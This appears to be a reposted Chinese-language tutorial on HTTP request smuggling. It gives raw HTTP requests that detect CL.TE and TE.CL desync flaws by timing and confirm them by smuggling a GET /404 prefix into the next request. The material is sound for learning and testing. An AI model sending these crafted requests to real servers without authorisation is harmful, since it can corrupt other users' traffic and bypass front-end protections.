HTTP请求走私
作者:互联网
HTTP请求走私
要使用 Burp Repeater 发送此请求,首先需要进入 Repeater 菜单并确保未选中“Update Content-Length”选项。
使用计时技术查找 CL.TE 漏洞
如果应用程序容易受到请求走私的 CL.TE 变体的攻击,
那么发送如下请求通常会导致时间延迟:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
1
A
X
由于前端服务器使用 Content-Length标头,它将仅转发此请求的一部分,省略 X. 后端服务器使用 Transfer-Encodingheader,处理第一个块,然后等待下一个块到达。 这将导致可观察到的时间延迟。
使用计时技术查找 TE.CL 漏洞
如果应用程序容易受到请求走私的 TE.CL 变体的攻击,
那么发送如下请求通常会导致时间延迟:
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 6
0
X
由于前端服务器使用 Transfer-Encoding标头,它将仅转发此请求的一部分,省略 X. 后端服务器使用 Content-Lengthheader,期望消息正文中有更多内容,并等待剩余内容到达。 这将导致可观察到的时间延迟。
确认 CL.TE 漏洞
可以发送如下攻击请求:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
如果攻击成功,则后端服务器将此请求的最后两行视为属于接收到的下一个请求。 这将导致随后的“正常”请求如下所示:
GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
q=smuggling
由于这个请求现在包含一个无效的 URL,服务器将响应状态码 404,表明攻击请求确实干扰了它。
确认 TE.CL 漏洞
可以发送如下攻击请求:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=
0
标签:HTTP,请求,Host,Content,Length,走私,1.1 来源: https://www.cnblogs.com/Icedisaster/p/15836745.html